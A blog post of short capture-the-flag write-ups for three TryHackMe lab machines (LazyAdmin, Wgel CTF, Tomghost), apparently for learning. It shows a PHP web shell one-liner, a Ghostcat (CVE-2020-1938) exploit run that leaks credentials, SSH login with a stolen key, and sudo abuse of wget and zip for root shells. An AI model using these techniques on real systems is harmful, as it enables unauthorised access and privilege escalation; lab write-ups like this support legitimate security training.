TryHackMe - Easy Machines (LazyAdmin, Wgel CTF, Tomghost)

Posted on Edited on In Views: Disqus: Word count in article: 209 Reading time ≈ 1 mins.
Writeups for LazyAdmin, Wgel CTF, and Tomghost

LazyAdmin

lazyadmin

1
2
# nmap option
nmap -F -sn -sV

Enumeration

1
2
3
4
5
6
❯ nmap 10.10.136.56 -p80 -sV
...
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

dirb http://10.10.136.56/
  • Username: manager (found in SQL file)
  • Password: Password123 (cracked via CrackStation)

Exploitation

  1. Upload PHP reverse shell: <?php system($_GET["cmd"]);?>
  2. Check sudo privileges: sudo -l
  3. Exploit backup.pl calling /etc/copy.sh.

Wgel CTF

wgelctf

Enumeration

1
2
3
❯ nmap 10.10.120.10 -sV -p80
...
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
  • Found username jessie in HTML comment.
  • Discovered .ssh/id_rsa via directory brute-forcing.

Exploitation

1
ssh -i id_rsa jessie@10.10.120.10

Privilege Escalation

1
2
3
jessie@CorpOne:~$ sudo -l
...
    (root) NOPASSWD: /usr/bin/wget

Exploit wget to overwrite /etc/sudoers or read sensitive files.

Tomghost

tomghost

Enumeration

1
2
3
4
❯ nmap 10.10.189.103 -p 8080,8009 -sV
...
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
8080/tcp open  http    Apache Tomcat 9.0.30

Exploitation

Exploit Ghostcat (CVE-2020-1938) to read WEB-INF/web.xml:

1
2
3
❯ python2 48143.py -f WEB-INF/web.xml -p 8009 10.10.189.103
...
skyfuck:8730281lkjlkjdqlksalks

Privilege Escalation

  1. Crack PGP key using gpg2john.
  2. Decrypt credential.pgp to get merlin's password.
  3. Exploit sudo /usr/bin/zip via GTFOBins.
1
2
3
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF